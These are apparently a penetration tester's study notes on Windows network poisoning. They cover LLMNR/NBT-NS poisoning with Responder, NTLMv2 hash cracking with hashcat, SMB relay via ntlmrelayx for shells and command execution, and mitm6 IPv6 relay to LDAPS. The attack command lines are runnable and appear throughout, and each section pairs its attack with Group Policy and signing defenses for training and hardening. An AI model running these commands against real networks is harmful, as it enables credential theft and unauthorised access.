Network poisoning

LLMNR Poisoning (Link Local Multicast and Name Resolution)

Explainations

• Used to identify hosts when DNS fails to do so

• Previously NBT-NS (Netbios named service)

• Key flaw is that the services utilize a user's username and NTLMv2 hash when appropriately responded to → when we respond to this service it responds back to us with a username and password hash

Steps

1. Run Responder first in the morning or right after lunch, because we need a lot of traffic python responder.py -l tun0 -rdw

2. An event occurs... Someone type the wrong network drive (for example)

3. We get the client ip, username, and the NTLMv2 hash thanks to the events listener

4. Crack the hash thanks to hashcat -m 5600 hashes.txt rockyou.txt

Defenses

Disable LLMNR and NBT-NS

To disable LLMNR : Select “Turn OFF Multicast Name Resolution” under Local Computer Policy > Computer Configuration > Administrative Templates > Network > DNS Client in the Group Policy Editor

To disable NBT-NS : Navigate to Network Connections > Network Adaptater Properties > TCP/IPv4 Properties > Advanced tab > WINS tab and select “Disable NetBIOS over TCP/IP”

If the company must use or cannot disable LLMNR/NBT-NS

The best course of action is to :

• Require Network Access Control

• Require strong user passwords (e.g., >14 characters in length and limit common word usage). The more complex and long the password, the harder it is for an attacker to crack the hash

SMB Relay attacks

Explainations

Instead of cracking hashes gathered with Responder, we can instead relay those hashes to specific machines and potentially gain access

Requirements :

• SMB signing must be disabled on the target (by default it's disabled on each machines and enabled and required on each servers)

• Relayed user credentials must be admin on machine

Steps

1. gedit Responder.conf (/etc/responder/Responder.conf) and turn off SMB and HTTP

2. Run Responder pythonResponder.py -I tun0 -rdwv (notice http & smb are now red, off)

3. Set up the relay pythonntlmrelayx.py -tf targets.txt -smb2support (put the vulnerables ip address into targets.txt)

4. An event occurs...

5. WIN

Discovering hosts with SMB signing disabled

nmap --script=smb2-security-mode.nse -p445 192.168.23.0/24

Some examples of use

SMB Shell

responder -I eth0 -rdwv

ntlmrelayx.py -tf targets.txt -smb2support -i (-i for intercative)

nc 127.0.0.1 11001 --> we are in a smb shell

Few commands :

• #help

• #shares

• #use c$

• #ls

Execute a meterpreter shell (create a shell thanks to msfvenom and setup a meterpreter listener before)

ntlmrelayx.py -tf targets.txt -smb2support -e shell.exe

Execute a command

ntlmrelayx.py -tf targets.txt -smb2support -c "whoami"

Defenses

• Enable SMB Signing on all devices → Pro: completly stops the attack → Con: can cause performance issues with file copies (50% decrease)

• Disable NTLM authentication on network → Pro: Completely stops the attack → Con: if Kerberos stops working, windows defaults back to NTLM

• Account tiering → Pro: Limits domain admins to specific tasks (e.g. only log onto servers with need for DA) → Con: Enforcing the policy may be difficult

• Local admin restriction → Pro: Can prevent a lot of lateral movement → Con: Potential increase in the amount of service desk tickets

MIMTM6 (Man in the middle for ipv6 :)

Explainations

Follow the link and read a little : https://github.com/fox-it/mitm6

Resources

mitm6 – compromising IPv4 networks via IPv6Fox-IT International blog

Steps

1. Run mitm6 -d protyro.local

2. ntlmrelayx.py -6 -t ldaps://192.168.23.130 -wh fakewpad.PROTYRO.local -l lootme

3. Wait for DNS v6 Request (about 30min) or at a computer start

4. In the lootme folder, view firefox domain_users_by_group.html

5. If the domain admin log, a new admin user will be setup for us :)

Defenses

IPv6 Poisoning abuses the fact that Windows queries for an IPv6 address even in IPv4-only environments. If you don't use IPv6 address internally, the safest way to prevent mitm6 is to block DHCPv6 traffic and incoming router advertisements in Windows Firewall via Group Policy. Disabling IPv6 entirely may have unwanted side effects. Setting the following predefined rules to Block instead of Allow prevents the attack from working: → (Inbound) Core Networking - Dynamic Host Configuration Protocol for IPv6 (DHCPv6-In) → (Inbound) Core Networking - Router Advertisement (ICMPv6-In) → (Outbound) Core Networking - Dynamic Host Configuration Protocol for IPv6 (DHCPv6-Out).

If WPAD is not use internally, disable it via Group Policy and by disabling the WinHttpAutoProxySvc service.

Relaying to LDAP and LDAPS can only be mitigated by enabling both LDAP signing and LDAP channel binding.

Consider Administrative users to the protected users group or making them as Account is sensitive and cannot be delegated, which will prevent any impersonation of that user via delegation.